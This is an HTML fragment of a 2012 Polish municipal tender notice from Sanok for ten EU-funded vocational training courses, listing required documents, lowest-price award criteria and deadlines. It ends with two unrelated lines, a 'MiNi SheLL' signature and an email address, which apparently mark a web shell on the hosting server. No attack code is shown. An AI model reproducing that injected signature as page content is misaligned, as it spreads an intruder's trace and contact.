<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Zaświadczenie (bądź kserokopia zaświadczenia) o wpisie do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy.
2) Oświadczenie o zamiarze (lub braku zamiaru) powierzenia części zamówienia podwykonawcom oraz określenie tej części.
3) W przypadku powołania się przez Wykonawcę na zasoby innych podmiotów (art. 26 ust. 2b ustawy) Wykonawca przedkłada pisemne zobowiązanie tych podmiotów, do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, a w przypadku polegania na wiedzy i doświadczeniu innych podmiotów jako podwykonawców również oświadczenie podwykonawcy 
o spełnieniu warunków udziału w postępowaniu dotyczące posiadania wiedzy 
i doświadczenia w zakresie części zamówienia wykonywanego przez podwykonawcę. 
4) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń dostępnych Wykonawcy w celu realizacji zamówienia.
5) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu (z którego wynika zakres pełnomocnictwa), podpisany przez osoby uprawnione do reprezentowania Wykonawcy, (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub istnieje ustawowy obowiązek ustanowienia pełnomocnika).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmniejszenia liczby uczestników projektu Zamawiający przewiduje możliwość zmian umowy w tym zakresie oraz zakresie wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.um-sanok.e-zet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Spraw Społecznych i Obywatelskich Urzędu Miasta w Sanoku
Biuro Projektu ul. Sobieskiego 1, pokój 104 
Tel. 13 46 41 744.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2012 godzina 08:00, miejsce: Gmina Miasta Sanoka, ul. Rynek 1 38-500 Sanok, Biuro Podawcze - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie współfinansowane ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki w ramach priorytetu VII Promocja Integracji Społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs: Kucharz małej gastronomii z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 4 uczestników w wymiarze 116h/osobę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs: Kierowca wózka jezdniowego z obsługą magazynu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 7 uczestników w wymiarze 107h/osobę;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs: Magazynier dla 1 uczestnika w wymiarze 90h/osobę;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 1 uczestnika w wymiarze 90h/osobę;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs: Bukieciarstwo/florystyka I i II stopnia z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 11 uczestników w wymiarze 116h/osobę;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs: Księgowość małych firm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 3 uczestników w wymiarze 135h/osobę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs: Obsługa obrabiarek sterowanych numerycznie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 3 uczestników w wymiarze 150h/osobę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs: Kasjer sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 5 uczestników w wymiarze 90h/osobę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs: Technolog prac wykończeniowych w budownictwie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 3 uczestników w wymiarze 220h/osobę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs: Projektowanie stron www..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 1 uczestnika w wymiarze 100h/osobę;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs: Wychowawca kolonijny/podwórkowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs dla 1 uczestnika w wymiarze 100h/osobę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com